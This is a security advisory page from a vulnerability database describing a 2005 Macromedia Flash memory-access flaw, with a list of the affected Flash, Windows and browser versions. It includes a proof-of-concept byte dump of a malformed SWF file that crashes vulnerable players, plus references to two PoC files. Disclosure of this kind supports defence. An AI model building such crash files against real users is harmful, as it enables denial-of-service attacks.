exploits , vulnerabilities , articles , Macromedia Flash ActionDefineFunction Memory Access Vulnerability

Title	Macromedia Flash ActionDefineFunction Memory Access Vulnerability
Published	2005-11-07-12:00AM
Updated	2005-11-10-02:53PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovered by Sec Consult.
Vulnerable	Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Professional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Home SP2 Microsoft Windows XP Home SP1 Microsoft Windows ME Microsoft Windows 98SE Microsoft Windows 98 Macromedia Flash 7.0.19 .0 Macromedia Flash 7.0 r19 Macromedia Flash 6.0.79 .0 Macromedia Flash 6.0.65 .0 Macromedia Flash 6.0.47 .0 Macromedia Flash 6.0.40 .0 Macromedia Flash 6.0.29 .0 Macromedia Flash 6.0 Microsoft Internet Explorer 5.0 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.5 preview Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 6.0 Netscape Communicator 4.6 Netscape Communicator 4.7 Netscape Communicator 4.51 Netscape Communicator 4.61 Netscape Communicator 4.72 Netscape Communicator 4.73 Netscape Communicator 4.74 Netscape Communicator 4.75 Netscape Communicator 4.76 Netscape Communicator 4.77 Netscape Communicator 4.78 Netscape Communicator 6.1
Not Vulnerable
Code	The following proof of concept is available: <swf> ----- [SetBackgroundColor] ----- TagID: 9 (size: 3 (short tag) - dump ->: x43x02xffx00x00 ----- [DoAction] ----- TagID: 12 (size: 60 (short tag) - dump ->: x3cx03x9bx08x00x41x41x41x41x41x41x41x41x00x40x00 x42x42x42x42x42x42x42x42x00x43x43x43x43x43x43x43 x43x00x44x44x44x44x44x44x44x44x00x45x45x45x45x45 x45x45x45x00x46x46x46x46x46x46x46x46x00x00 ----- [ShowFrame] ----- TagID: 1 (size: 0 (short tag) - dump ->: x40x00 ----- [End] ----- TagID: 0 (size: 0 (short tag) - dump ->: x00x00 </swf> The following proof of concept (df.swf) provided by Karma <karma@DesignFolks.com.au> will determine if a vulnerable Flash Player is installed. If the Flash Player is vulnerable, opening the file will crash the browser. Otherwise a yellow image will be displayed. The 'flash_dos_poc.c' proof of concept exploit by BassReFLeX creates a SWF file sufficient to exploit this issue to crash a vulnerable Flash Player. /data/vulnerabilities/exploits/df.swf /data/vulnerabilities/exploits/flash_dos_poc.c
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
• 2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities
• 2009-12-17 Quick Heal AntiVirus Insecure Program File Permissions Local Privilege Escalation Vulnerability
• 2009-12-17 IntelliCom NetBiter webSCADA Multiple Default Password Security Bypass Vulnerabilities
• 2009-12-17 Webmatic Multiple Unspecified SQL Injection and Cross-Site Scripting Vulnerabilities
• 2009-12-17 ManageEngine Password Manager Pro Cross Site Scripting Vulnerability
• 2009-12-17 HP OpenView Storage Data Protector Multiple Remote Code Execution Vulnerabilities
• 2009-12-17 iDevSpot iSupport Multiple Cross Site Scripting Vulnerabilities
• 2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
• 2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 22:33:24 +0000